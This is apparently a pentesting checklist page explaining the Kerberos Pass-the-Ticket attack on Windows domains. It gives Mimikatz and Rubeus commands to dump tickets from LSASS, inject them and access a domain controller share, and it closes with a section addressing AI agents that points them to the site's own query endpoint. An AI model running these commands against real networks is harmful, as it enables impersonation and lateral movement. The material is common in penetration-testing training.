# Pass the Ticket Attack

### Overview

**Pass-the-Ticket (PtT)** is a Kerberos-based attack where an attacker steals a valid Kerberos ticket (TGT or TGS) from memory and injects it into another session to impersonate that user.

Unlike:

* **Pass-the-Hash** → abuses NTLM hashes
* **Overpass-the-Hash** → uses NTLM hash to request a TGT

**Pass-the-Ticket directly reuses a legitimate Kerberos ticket.**

No password/hash needed.

### What can be stolen

Two types of Kerberos tickets:

#### 1. TGT (Ticket Granting Ticket)

* Issued by Domain Controller (KDC)
* Used to request service tickets (TGS)
* Most powerful ticket to steal

#### 2. TGS (Service Ticket)

* Issued for specific services (e.g., CIFS/DC1)
* More limited scope

If you steal a TGT → You can request new TGS tickets.\
If you steal a TGS → You can access that specific service.

### Why this Works

On Windows:

* Tickets are stored in **LSASS memory**
* Associated with a logon session
* Managed by the Kerberos SSP (Security Support Provider)

When a user logs in:

1. User authenticates and tre KDC issues a TGT.
2. The TGT is stored in LSASS.
3. Service tickets requested as needed.

Kerberos assumes:

> If a process has a valid ticket in its logon session, it is that user.

There is **no re-validation of how the ticket got there.**

So if an attacker:

* Extracts the ticket
* Injects it into another session

**Windows trusts it**

### Prerequsities

1. Local admin on victim machine (to dump LSASS)
2. A user currently logged in (preferably privileged)
3. Mimikatz or Rubeus

### Steps

1. Dump Kerberos Tickets:

   ```bash
   # Mimikatz
   mimikatz.exe
   privilege::debug
   # Will create .kirbi files for tickets in current dir.
   # Eg: krbtgt_corp.com.kirbi (TGT)
   # Eg: dave@cifs-web04.kirbi (TGS)
   sekurlsa::tickets /export

   # Use rubeus instead
   Rubeus.exe dump
   ```
2. Inject the ticket onto the current session (some other user)

   ```bash
   # Mimikatz
   kerberos::ptt krbtgt_corp.com.kirbi

   # Use rubeus to inject via Base64 Ticket or from file
   Rubeus.exe ptt /ticket:<base64_ticket>
   Rubeus.exe ptt /ticket:admin.kirbi
   ```
3. Verify if the TGS/TGT is present via `klist`. \
   For Windows, once a ticket is obtained/created, it needs to be referenced in the `KRB5CCNAME` environment variable for it to be used by others tools.

   ```bash
   export KRB5CCNAME=$path_to_ticket.ccache
   ```
4. Access resources with that TGS:

   ```bash
   dir \\DC1\C$
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/lateral-movement/pass-the-ticket-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.